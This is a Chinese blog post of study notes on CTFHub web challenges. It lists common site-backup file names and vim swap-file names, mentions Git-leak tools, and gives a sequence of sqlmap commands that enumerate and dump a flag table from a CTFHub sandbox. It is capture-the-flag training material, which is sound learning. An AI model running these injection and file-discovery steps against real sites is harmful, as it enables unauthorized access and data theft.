CTFHub技能树做题总结

本文最后更新于 2025年11月15日晚上

WEB

信息泄露

备份文件下载

网页源码

常见的网站源码备份文件后缀
tar
tar.gz
zip
rar
常见的网站源码备份文件名
web
website
backup
back
www
wwwroot
temp

vim缓存

vim异常退出后，会存储临时文件，如下三种
如编辑 index.php
第一次产生意外退出保存为 .index.php.swp
第二次产生意外退出保存为 .index.php.swo
第三次产生意外退出保存为 .index.php.swn

Git泄露

主要用到GitHack,Git_Extract

SQL

SQLmap的使用

python sqlmap.py -u http://challenge-07d7ae9cbbdb5f5e.sandbox.ctfhub.com:10800/?id=1 --current-db

python sqlmap.py -u http://challenge-07d7ae9cbbdb5f5e.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

python sqlmap.py -u http://challenge-07d7ae9cbbdb5f5e.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

python sqlmap.py -u http://challenge-07d7ae9cbbdb5f5e.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

依次为查询最近使用的数据库，查询表，查询字段，转存数据

CTF

CTFHub技能树做题总结

https://www.sunynov.top/2025/11/08/CTFHub技能树做题总结/

作者

suny

发布于

2025年11月8日

许可协议

SQL注入上一篇

浏览器BS架构与请求包、返回包原理下一篇